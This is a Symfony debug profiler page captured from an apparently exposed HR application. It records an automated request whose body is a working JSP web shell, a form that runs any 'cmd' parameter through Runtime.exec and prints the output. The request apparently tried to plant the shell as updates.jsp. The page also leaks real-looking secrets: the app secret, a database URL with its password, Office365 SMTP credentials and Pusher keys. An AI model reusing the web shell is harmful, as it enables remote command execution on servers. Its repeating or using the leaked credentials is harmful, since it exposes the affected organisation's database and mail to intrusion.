ErrorController
Request
GET Parameters
No GET parameters
POST Parameters
No POST parameters
Uploaded Files
No files were uploaded
Request Attributes
Request Headers
Header | Value |
---|---|
accept | "*/*" |
accept-encoding | "gzip, deflate" |
connection | "keep-alive" |
content-length | "414" |
content-type | "application/x-jsp" |
host | "54.77.160.52" |
user-agent | "python-requests/2.32.3" |
x-php-ob-level | "1" |
Request Content
Raw
<%@ page import="java.io.*" %> <html><body> <form method="GET"><input type="text" name="cmd"><input type="submit" value="Run"></form> <% if(request.getParameter("cmd") != null) { Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream())); String l; while((l=r.readLine())!=null){ out.println(l+"<br>"); } } %> </body></html>
Response
Response Headers
Header | Value |
---|---|
cache-control | "no-cache, private" |
content-type | "text/html; charset=UTF-8" |
date | "Fri, 11 Apr 2025 00:18:53 GMT" |
x-debug-exception | "No%20route%20found%20for%20%22PUT%20http%3A%2F%2F54.77.160.52%2Fwebapps%2FROOT%2Fupdates.jsp%22" |
x-debug-exception-file | "%2Fvar%2Fwww%2Fhtml%2FSIRH%2Fvendor%2Fsymfony%2Fhttp-kernel%2FEventListener%2FRouterListener.php:130" |
x-debug-token | "4acecf" |
Cookies
Request Cookies
No request cookies
Response Cookies
No response cookies
Session
Session Metadata
No session metadata
Session Attributes
No session attributes
Session Usage
0
Usages
Stateless check enabled
Session not used.
Flashes
Flashes
No flash messages were created.
Server Parameters
Server Parameters
Defined in .env
Key | Value |
---|---|
APP_ENV | "dev" |
APP_SECRET | "6267cca59157575359d8e96a4dc634e6" |
DATABASE_URL | "mysql://Dev:fUfFlbM@t[M*G)(j@sirh-db.chlyq6uxnmog.eu-west-1.rds.amazonaws.com:3306/sirh" |
MAILER_DSN | "smtp://noreply@drh-fcz.ma:wnlxmftlnzhdfhgt@smtp.office365.com:587?encryption=tls" |
MESSENGER_TRANSPORT_DSN | "doctrine://default" |
PUSHER_APP_ID | "1876502" |
PUSHER_KEY | "a297c5496aed849ec7bd" |
PUSHER_SECRET | "6103f3897e4b47aed55e" |
Defined as regular env variables
Key | Value |
---|---|
APP_DEBUG | "1" |
CONTENT_LENGTH | "414" |
CONTENT_TYPE | "application/x-jsp" |
CONTEXT_DOCUMENT_ROOT | "/var/www/html/SIRH/public" |
CONTEXT_PREFIX | "" |
DOCUMENT_ROOT | "/var/www/html/SIRH/public" |
GATEWAY_INTERFACE | "CGI/1.1" |
HTTP_ACCEPT | "*/*" |
HTTP_ACCEPT_ENCODING | "gzip, deflate" |
HTTP_CONNECTION | "keep-alive" |
HTTP_HOST | "54.77.160.52" |
HTTP_USER_AGENT | "python-requests/2.32.3" |
PATH | "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin" |
PHP_SELF | "/index.php" |
QUERY_STRING | "" |
REMOTE_ADDR | "45.61.146.184" |
REMOTE_PORT | "59006" |
REQUEST_METHOD | "GET" |
REQUEST_SCHEME | "http" |
REQUEST_TIME | 1744330733 |
REQUEST_TIME_FLOAT | 1744330733.1011 |
REQUEST_URI | "/webapps/ROOT/updates.jsp" |
SCRIPT_FILENAME | "/var/www/html/SIRH/public/index.php" |
SCRIPT_NAME | "/index.php" |
SERVER_ADDR | "172.31.40.86" |
SERVER_ADMIN | "webmaster@localhost" |
SERVER_NAME | "54.77.160.52" |
SERVER_PORT | "80" |
SERVER_PROTOCOL | "HTTP/1.1" |
SERVER_SIGNATURE | "<address>Apache/2.4.52 (Ubuntu) Server at 54.77.160.52 Port 80</address>\n" |
SERVER_SOFTWARE | "Apache/2.4.52 (Ubuntu)" |
SYMFONY_DOTENV_VARS | "APP_ENV,APP_SECRET,DATABASE_URL,MESSENGER_TRANSPORT_DSN,MAILER_DSN,PUSHER_APP_ID,PUSHER_KEY,PUSHER_SECRET" |
Parent Request
Return to parent request (token = d46ba1)
Key | Value |
---|---|
_remove_csp_headers | true |
_stopwatch_token | "00f13b" |